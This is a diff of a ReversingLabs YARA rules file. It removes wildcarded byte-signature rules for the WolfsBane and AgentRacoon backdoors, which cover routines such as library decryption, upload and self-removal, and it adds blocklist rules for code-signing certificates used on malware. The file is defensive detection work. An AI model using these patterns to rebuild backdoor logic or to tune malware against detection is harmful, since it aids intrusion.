-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8B CB 4C 8B F0
-            E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 45 33 F6 83 64 24 ?? ?? 48 8D 44 24 ??
-            48 89 44 24 ?? 45 33 C9 48 83 64 24 ?? ?? 45 33 C0 33 D2 33 C9 FF 15 ?? ?? ?? ?? 8B
-            44 24 ?? 85 C0 74 ?? 8D 48 ?? 48 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8D
-        }
-		$get_dns_servers_p2 = {
-            44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C 24 ?? 33 C9 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8B E8 EB ?? 48 8B CB E8 ?? ?? ?? ?? 33 ED 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8D 53 ?? 8D
-            4F ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 4C 8B C7 48 8D 15 ?? ?? ?? ?? 4D 03 C0
-            48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 4C 8B F8 48 85 DB 74 ?? 48 8B CB E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85
-            ED 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4D 8B C7 48 0F 45 D5 49 8B CE 48 83 64
-            24 ?? ?? 48 8B F0 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 49
-            8B CE 48 8B D8 E8 ?? ?? ?? ?? 48 8B CD E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 8B
-            CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B C3 48 8B 5C 24 ?? 48 83 C4 ?? 41 5F
-            41 5E 5F 5E 5D C3
-        }
-		$get_network_interfaces_p1 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 56 41 57 48 81 EC ?? ?? ?? ?? B9 ?? ?? ?? ??
-            89 48 ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
-            48 8B C8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CE E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8B
-            C3 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B CE FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8B F6 48 85 F6 0F 84 ?? ?? ?? ?? 4C 8D 3D
-            ?? ?? ?? ?? 48 83 64 24 ?? ?? 48 8D 05 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 48 89 44 24
-            ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 45 8B 8E ?? ?? ?? ?? 48 8B
-            F8 41 8B C9 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74
-            ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 F9 ?? 74 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D
-            15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15
-            ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ??
-            ?? ?? ?? 45 33 C0 48 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ?? ?? ?? 48
-        }
-		$get_network_interfaces_p2 = {
-            8B C8 48 8D 15 ?? ?? ?? ?? 4D 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ??
-            ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D
-            86 ?? ?? ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 41 83 BE ?? ??
-            ?? ?? ?? 48 8B C8 74 ?? 48 83 64 24 ?? ?? 4D 8D 8E ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ??
-            4C 89 7C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 45 33 C0 48 8D 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 41 83 BE ?? ?? ?? ?? ?? 74 ?? 4D 8D 86 ?? ?? ?? ?? 45 33 C9 48 8D
-            15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 41 80 38 ?? 74 ?? 45 33
-            C9 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8B 36 48 8D 15 ?? ?? ?? ?? 45 33
-            C0 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 4D 85 F6 0F 85 ?? ?? ?? ?? EB ?? 48 85 F6 74 ??
-            48 8B CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF 48 8B D8 E8 ?? ?? ?? ?? 48
-            8B C3 EB ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41
-            5E 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( $get_system_information ) and ( all of ( $get_dns_servers_p* ) ) and ( all of ( $get_network_interfaces_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" and 1656028800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Wolfsbane : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WolfsBane backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "07b96e74-8ad1-5400-a23c-c14fea78ecdd"
-		date = "2025-03-17"
-		modified = "2025-03-17"
+		id = "bb58ae8d-ef28-5644-abe8-2d4d8c892e95"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.WolfsBane.yara#L1-L124"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c2bc992375bfa989c2a18a52e09c551cd6dfefda8fb96e7af4dabfead76e784f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10770-L10786"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ff773d252e5e0402171ae15d7ab43bcfd313eb8c326ed5f128a89ec43386a52"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "WolfsBane"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$load_embedded_library = {
-            41 57 41 56 41 55 41 54 49 89 FC 55 53 48 89 F3 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48
-            C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ??
-            ?? ?? C7 47 ?? ?? ?? ?? ?? 48 83 C0 ?? 48 C7 47 ?? ?? ?? ?? ?? 48 89 07 48 8D 47 ??
-            48 89 47 ?? 48 89 47 ?? 48 8D 47 ?? 48 89 47 ?? 48 89 47 ?? 48 8B 06 48 39 46 ?? 0F
-            84 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? BF ?? ?? ?? ?? 49 89 E5 49 8D 47 ?? 48 89 44 24
-            ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 58 ?? 48 8B 1D ?? ?? ?? ?? 48 C7 40 ??
-            ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 83 C2 ?? 48 89 44 24 ?? 48 C7 44
-            24 ?? ?? ?? ?? ?? 48 89 10 48 8D 43 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 89 04 24 48 8D 43 ?? 48 89 44 24 ?? 48 89 E0 48 03 03 48 8B 50 ?? 48 39
-            50 ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 4C 8D 74 24 ?? 48 8D 54 24 ?? 4C 89 F7
-            48 8B 70 ?? 31 C0 80 3E ?? 0F 94 C0 48 01 C6 E8 ?? ?? ?? ?? 48 8B 04 24 4C 89 ED 48
-            03 68 ?? 48 8B 7D ?? 48 3B 7D ?? 0F 84 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 4C 89
-            F6 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 8D
-            43 ?? 48 8B 7C 24 ?? 48 89 04 24 49 8D 47 ?? 48 85 FF 48 89 44 24 ?? 74 ?? 48 8B 07
-            FF 50 ?? 48 8B 6C 24 ?? 48 8B 5C 24 ?? 48 39 DD 74 ?? 66 0F 1F 44 00 ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 83 C3 ?? 48 39 DD 75 ?? 48 8B 6C 24 ?? 48 85 ED 74 ?? 48 89 EF E8 ??
-            ?? ?? ?? 48 83 C4 ?? 4C 89 E0 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$decrypt_embedded_library_1 = {
-            41 57 41 56 41 55 41 54 55 48 89 F5 53 48 89 FB 48 81 EC ?? ?? ?? ?? 48 8B 77 ?? 48
-            8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ??
-            48 8B 84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 39 45 ?? 0F
-            84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
-            4C 89 E7 E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E2 48 89 C7 48
-            89 44 24 ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 39 84
-            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8D BC
-            24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0 ?? 48 83 C2 ?? 48 89 84 24 ?? ?? ??
-            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8B 23 48 89 94 24 ?? ?? ?? ??
-            4C 89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 63 ?? 4C
-            89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 48 8B 5B ?? 48 89
-            DF E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 48 89 DE E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 EE
-            E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 4C 89 FE 48 C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 DF 48 C7 84 24 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE
-            48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ??
-            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89
-            C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8
-        }
-		$decrypt_embedded_library_2 = {
-            48 8D 7C 24 ?? 49 89 F9 0F 1F 84 00 ?? ?? ?? ?? 89 CA 89 C8 83 C1 ?? C1 FA ?? F7 FB
-            48 63 D2 0F B6 04 16 41 88 01 49 83 C1 ?? 81 F9 ?? ?? ?? ?? 75 ?? 48 8D B5 ?? ?? ??
-            ?? 48 89 E8 31 D2 66 90 0F B6 18 44 0F B6 0F 48 83 C7 ?? 0F B6 CB 41 8D 0C 09 8D 14
-            11 41 89 D3 41 C1 FB ?? 41 C1 EB ?? 44 01 DA 81 E2 ?? ?? ?? ?? 44 29 DA 48 63 CA 83
-            C2 ?? 44 0F B6 8C 0C ?? ?? ?? ?? 44 88 08 48 83 C0 ?? 88 9C 0C ?? ?? ?? ?? 48 39 F0
-            75 ?? 4D 29 C2 45 85 D2 0F 8E ?? ?? ?? ?? 41 83 EA ?? 31 C0 31 D2 4F 8D 54 10 ?? 66
-            0F 1F 84 00 ?? ?? 00 00 83 C2 ?? 89 D1 C1 F9 ?? C1 E9 ?? 01 CA 81 E2 ?? ?? ?? ?? 29
-            CA 48 63 CA 83 C2 ?? 0F B6 BC 0C ?? ?? ?? ?? 40 0F B6 DF 8D 04 03 89 C6 C1 FE ?? C1
-            EE ?? 01 F0 25 ?? ?? ?? ?? 29 F0 48 63 F0 83 C0 ?? 44 0F B6 8C 34 ?? ?? ?? ?? 44 88
-            8C 0C ?? ?? ?? ?? 40 88 BC 34 ?? ?? ?? ?? 02 9C 0C ?? ?? ?? ?? 0F B6 DB 0F B6 8C 1C
-            ?? ?? ?? ?? 41 30 08 49 83 C0 ?? 4D 39 D0 75 ?? B9 ?? ?? ?? ?? 31 C0 48 89 EF F3 48
-            AB 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48
-            8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48
-            8B 84 24 ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 74 ?? 48 8B BC 24 ?? ?? ?? ??
-            48 85 FF 74 ?? E8 ?? ?? ?? ?? 4C 89 FF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ??
-            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$remove_backdoor_p1 = {
-            41 57 48 8D 35 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24
-            ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ??
-            48 89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48
-            89 C6 48 89 D7 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ??
-            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 8B 35 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89
-            EF 49 8D 76 ?? E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ??
-            ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 89 DF
-            E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 49
-            8D 76 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ??
-            ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 89 DE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
-            E6 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24
-        }
-		$remove_backdoor_p2 = {
-            45 31 FF 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ??
-            ?? 48 8D 35 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8D 94 24
-            ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 89
-            E2 48 89 C6 4C 89 EF E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
-            48 89 EF E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 8B 06 85 C0 0F 84
-            ?? ?? ?? ?? 48 8D 5C 24 ?? 31 C0 B9 ?? ?? ?? ?? 45 85 FF 48 89 DF F3 48 AB 0F 85 ??
-            ?? ?? ?? 44 8B 7C 24 ?? 45 85 FF 74 ?? 31 C0 B9 ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 54
-            24 ?? 48 8D 35 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 EF
-            E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ??
-            E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" and 1654819200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "eb06576e-11ea-58ba-aa19-68c161f6aa68"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10788-L10804"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "174fe170c26a8197486e7b390d9fce4da61fb68ee5dc9486d43dbeb3cf659c3a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $load_embedded_library ) and ( all of ( $decrypt_embedded_library_* ) ) and ( all of ( $remove_backdoor_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" and 1648684800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Agentracoon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AgentRacoon backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ad74d530-ffbd-589f-b941-3a5d9ec737b6"
-		date = "2023-12-15"
-		modified = "2023-12-15"
+		id = "9158c9a5-37fc-54bc-9601-3aa347a421ab"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/ByteCode.MSIL.Backdoor.AgentRacoon.yara#L1-L128"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3ba73f19f59c2e5880df820c52f16997047d7299eb14d421ae2ed8f3790bcfe9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10806-L10822"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3d4b5e56962d04bc35451eeab4c1870c8653c9afcbb28dc6bad7cfb1711e9df1"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "AgentRacoon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$unpack_response_p1 = {
-            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 18 91 9C 11 ?? 73 ?? ?? ?? ?? 0A 06 16 6F ?? ??
-            ?? ?? 2D ?? 73 ?? ?? ?? ?? 7A 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 19 91 9C 11 ?? 73
-            ?? ?? ?? ?? 0A 06 1A 6F ?? ?? ?? ?? 2C ?? 06 1B 6F ?? ?? ?? ?? 2C ?? 06 1C 6F ?? ??
-            ?? ?? 2C ?? 06 1D 6F ?? ?? ?? ?? 2C ?? 73 ?? ?? ?? ?? 7A 1F ?? 0B 2B ?? 07 17 58 0B
-            03 07 91 2D ?? 07 17 58 0B 03 8E 69 07 59 0C 08 8D ?? ?? ?? ?? 0D 03 07 09 16 08 28
-            ?? ?? ?? ?? 1A 13 ?? 2B ?? 11 ?? 17 58 13 ?? 09 11 ?? 91 2D ?? 11 ?? 17 58 13 ?? 09
-            8E 69 11 ?? 59 0C 08 8D ?? ?? ?? ?? 13 ?? 09 11 ?? 11 ?? 16 08 28 ?? ?? ?? ?? 02 12
-            ?? FE 15 ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ??
-            7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ??
-            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
-            ?? 12 ?? 07 1F ?? 59 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ??
-            ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 1A 59 8D ?? ?? ?? ?? 7D ??
-            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
-            ?? 12 ?? 1A 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11
-            ?? 7D ?? ?? ?? ?? 03 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 18
-        }
-		$unpack_response_p2 = {
-            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1A 02 7C ?? ?? ?? ?? 7B ??
-            ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1C 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ??
-            ?? ?? 03 1E 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ??
-            ?? 16 07 1F ?? 59 28 ?? ?? ?? ?? 09 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ??
-            ?? ?? ?? 09 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 09 1A 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? 1A 59 28 ?? ?? ?? ?? 11 ?? 16 02 7C ?? ?? ?? ?? 7B
-            ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 11 ?? 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28
-            ?? ?? ?? ?? 11 ?? 1A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 1A 28 ?? ?? ?? ?? 11 ?? 1E
-            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 1F ?? 91 13 ?? 02 7C ?? ?? ?? ?? 11 ??
-            8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ??
-            28 ?? ?? ?? ?? 2A
-        }
-		$upload = {
-            28 ?? ?? ?? ?? 0A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 16 0B 38 ??
-            ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 06 02 7C ?? ?? ?? ??
-            7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 02 7C ?? ?? ?? ??
